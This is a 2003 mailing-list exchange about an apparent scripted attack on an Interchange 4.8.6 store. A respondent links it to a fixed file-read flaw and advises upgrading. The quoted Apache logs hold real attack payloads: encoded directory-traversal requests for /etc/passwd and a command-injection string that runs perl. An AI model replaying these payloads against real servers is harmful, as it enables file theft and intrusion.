[ic] Hack attempt on IC 4.8.6
Ed LaFrance
edl at newmediaems.com
Sat Nov 15 09:18:07 EST 2003
At 10:35 PM 11/14/2003 -0800, you wrote:
> >From what I can tell this person was unsuccessful. My IC and Apache
> logs show multiple attempts to grab my passwd file by inserting many
> ../../../../../'s in the URLs and attempts to execute arbitrary perl code
> by manipulating URL parameters. Here are a few lines:
>
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET
>/hya/index.html?id=%2e%2e%2f%
>2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
>%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
>f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible;
>MSIE 4
>.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET
>/hya/index.html?id=foo%3bfoo%
>7cperl%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00
>HTTP/1.0" 403
> 82 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=
>HTTP/1.0"
> 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id=
>HTTP/1.0"
> 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
>/hya/customerservice?mv_sessi
>on_id=6MZFj58R&mv_pc=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2
>e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%
>2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&spg=customerservice
>HTT
>P/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
>/hya/customerservice?mv_sessi
>on_id=6MZFj58R&mv_pc=1&spg=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
>f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%
>2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0"
>302 39
>"-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
>/hya/customerservice?mv_sessi
>on_id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2
>e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
>2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&mv_pc=1&spg=customerservice
>HTTP/1.0"
>403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>
>Sorry for the weird wrapping. The log goes on and on like this.
>
>Has anyone else seen this kind of attempt? It looks like a script judging
>by the rapidity of the accesses.
>
>Ryan
I just grep'd the logs on a couple of servers for matching substrings and
came up empty. I get the impression that this attempt was targeted
specifically at interchange. There was a vulnerability in the 4.8 branch
which could allow arbitrary file reads with a technique like this, but it
was fixed, so if you are running 4.8.7 or higher you should be ok. If you
are running an earlier version, I strongly recommend an upgrade.
- Ed
>
===============================================================
New Media E.M.S. Technology Solutions for Business
11630 Fair Oaks Blvd., #250 eCommerce | Consulting | Hosting
Fair Oaks, CA 95628 edl at newmediaems.com
(916) 961-0446 http://www.newmediaems.com
(866) 519-4680 Toll-Free (916) 961-0447 Fax
===============================================================
More information about the interchange-users
mailing list